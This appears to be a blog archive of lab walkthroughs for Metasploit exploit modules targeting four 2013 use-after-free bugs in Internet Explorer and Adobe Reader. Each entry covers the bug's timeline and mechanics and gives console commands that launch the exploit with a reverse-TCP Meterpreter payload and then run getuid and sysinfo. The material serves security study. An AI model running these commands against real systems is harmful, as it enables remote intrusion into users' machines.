Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2013-3897 Microsoft Internet Explorer CDisplayPointer Use-After-Free

Timeline :

Vulnerability discovered exploited in the wild the 2013-09
Patched by the vendor via MS13-080 the 2013-10-08
Metasploit PoC provided the 2013-10-12

PoC provided by :

Unknown
sinn3r

Reference(s) :

CVE-2013-3897
MS13-080

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a “onpropertychange” event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called “onselect”. The “onselect” event will allow us to set up for the actual event handler we want to abuse – the “onpropertychange” event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in “onselect”, this will trigger “onpropertychange”. During “onpropertychange” event handling, a free of the CDisplayPointer object can be forced by using an “Unslect” (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer’s position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.

Commands :

use exploit/windows/browser/ms13_080_cdisplaypointer
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3893 Microsoft Internet Explorer SetMouseCapture UAF

Timeline :

Vulnerability discovered exploited in the wild the 2013-08-23
Microsoft publish Microsoft Security Advisory 288750 the 2014-09-17
Microsoft publish a Fix it workaround the 2013-09-17
Metasploit PoC provided the 2013-09-30
Patched by the vendor via MS13-080 the 2013-10-08

PoC provided by :

Unknown
sinn3r
Rich Lundeen

Reference(s) :

CVE-2013-3893
MS13-080
MSA-2887505

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and pass on to more functions, eventually this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack.

Commands :

use exploit/windows/browser/ie_setmousecapture_uaf
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3346 Adobe Reader ToolButton Use After Free

Timeline :

Vulnerability discovered by Soroush Dalili and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2013-09-11
Patched by the vendor via APSB13-15 the 2013-08-03
Coordinated public release of advisory by ZDI the 2013-09-11
Vulnerability exploited in the wild in combination with another vulnerability the 2013-11-27
Metasploit PoC provided the 2013-12-16

PoC provided by :

Soroush Dalili
Unknown
sinn3r
juan vazquez

Reference(s) :

CVE-2013-3346
OSVDB-96745
ZDI-13-212
APSB13-15

Affected version(s) :

Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior.

Tested on :

with Adobe Reader 11.0.2 on Windows XP SP3

Description :

This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this module doesn’t support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used. This exploit also exist in File format exploit/windows/fileformat/adobe_toolbutton

Commands :

use exploit/windows/browser/adobe_toolbutton
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3163 Microsoft Internet Explorer CAnchorElement UAF

Timeline :

Vulnerability discovered exploited in targeted attacks
Vulnerability reported to the vendor by Jose Antonio Vazquez Gonzalez via VeriSign iDefense Labs
Patched by the vendor the 2013-07-09
Metasploit PoC provided the 2013-09-09

PoC provided by :

Jose Antonio Vazquez Gonzalez
Orange Tsai
Peter Vreugdenhil
sinn3r

Reference(s) :

CVE-2013-3163
OSVDB-94981
MS13-055

Affected version(s) :

All versions of Internet Explorer 8 on Windows.

Tested on :

with Internet Explorer 8 on Windows 7 SP1

Description :

In IE8 standards mode, it’s possible to cause a use-after-free condition by first creating an illogical table tree, where a CPhraseElement comes after CTableRow, with the final node being a sub table element. When the CPhraseElement’s outer content is reset by using either outerText or outerHTML through an event handler, this triggers a free of its child element (in this case, a CAnchorElement, but some other objects apply too), but a reference is still kept in function SRunPointer::SpanQualifier. This function will then pass on the invalid reference to the next functions, eventually used in mshtml!CElement::Doc when it’s trying to make a call to the object’s SecurityContext virtual function at offset +0x70, which results a crash. An attacker can take advantage of this by first creating an CAnchorElement object, let it free, and then replace the freed memory with another fake object. Successfully doing so may allow arbitrary code execution under the context of the user. This bug is specific to Internet Explorer 8 only. It was originally discovered by Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again by Orange Tsai at Hitcon 2013.

Commands :

use exploit/windows/browser/ms13_055_canchor
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo